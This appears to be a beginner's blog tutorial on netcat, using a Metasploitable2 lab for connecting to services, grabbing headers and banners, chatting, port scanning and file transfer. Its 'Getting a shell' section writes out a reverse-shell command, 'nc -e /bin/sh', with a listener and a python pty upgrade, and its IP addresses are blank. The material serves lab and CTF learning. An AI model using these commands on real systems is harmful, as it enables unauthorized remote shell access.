Beginners guide to Netcat

In this article we will learn some basic things about netcat and how to get a shell by using it.

  1. Introduction

  2. Starting Netcat

  3. Connect to a server

  4. HTTP Header

  5. Communication via netcat

  6. Getting a shell

  7. Port scanning


netcat (also known as nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP.

With the help of Netcat we can investigate a network and can debug it also.

Starting with netcat

To start with the netcat we will type the command nc -h

These are the command options that we can use along with the netcat to perform more operations in a network.

Connect to a server

Here we have used metasploitable2 machine to setup the ftp server , So that we can connect to it. But before connecting let’s check if the port 21 is open or not by running the command

Command used : nmap -p21

Here we have configured our metasploitable2 machine with IP address So in the next step we will try to connect with the server using nc.

After providing the correct login credentials we have successfully logged into the server.


We can use nc to fetch the information about the server.

To do this we will use the same machine.

First of all we check if the port 80 is open or not by executing the command nmap -p80

port 80 is open. Now let’s fetch the HTTP Header using the command

nc 80


The option HEAD/HTTP/1.1 gives us the header and the source code of the of the HTTP service running on the server.

Communication via netcat

Netcat can also be used to communicate or to chat between two users , but before doing any kind of communication we need to establish the connection between the two users.So for doing this we need two machines in the same network . we can do this by using virtual box or any other utility.

In this scenario we have to create two users. One will be the listener and another will be the initiator.

Let’s create the listener first using the command:

nc -lvp 4444

  1. l means listen mode

  2. v means verbose mode

  3. p means local port

Now it’s time to setup the initiator using the command

nc 4444

Here we have used the IP address of the machine on which we have established the listener and the port we have provided earlier (4444)

Now the connection is established and we can start communicating.

We can see that communication between the two user is successful.

Getting a shell

Netcat can also be used to get a reverse shell. This is very useful while doing CTF challenges. After getting a reverse shell we can do privilege escalation to gain root access.

Here we need two machines . one will be the attacking machine and another one will be the targeted machine.

IP of targeted machine :

IP of attacker machine :

Execute nc -lvp 4442 on the attacker machine

Now let’s execute the command on target machine

nc -e /bin/sh 4442

As we can see that we managed to get a shell of the target machine. Now here we will use python one-liner to get a proper shell.first of all we have to check if the targeted machine is using python2 or python3 and for that we executed the command on the attacker machine

ls /usr/bin/python*

Target machine is using python2 so our next command will be

Python -c’import pty;pty.spawn(“/bin/bash”)’

This will give us the shell access of the target machine.

Port scanning

We can use netcat for port scanning also.netcat can perform TCP and UDP scan.Here we use -z command option for port  scanning.

Command used :

nc -v -n -z -w 2 21-8081

  1. -v means verbose mode

  2. -n means only numeric IP address

  3. -z used for scanning

  4. -w means time-out

Now to perform UDP scan we will use { -u } command option.

Some more information

Netcat can also be used for file transferring.

We will use two machines. One is Kali Linux and another one is metasploitable2 .

We will create a file hey.txt in metasploitable2 machine and will send the file to Kali Linux machine.

Type nc -v -w 25 -p 8888 -l < hey.txt in metasploitable2 machine

Now to receive the file in kali Linux machine we will execute the command.

nc -v -w 2 8888 > hey.txt

After sometime the connection will be closed automatically and we can see the output of hey.txt file by using the cat command.

Netcat can be used for banner grabbing

nc 22

So this was a basic guide to netcat. It’s a very useful tool in CTF challenges.

Subscribe to HacLabs newsletter

Get priority notification on the release of the latest articles.

  • YouTube
  • Twitter
  • Instagram
  • Linkedin

© 2020 by HacLabs.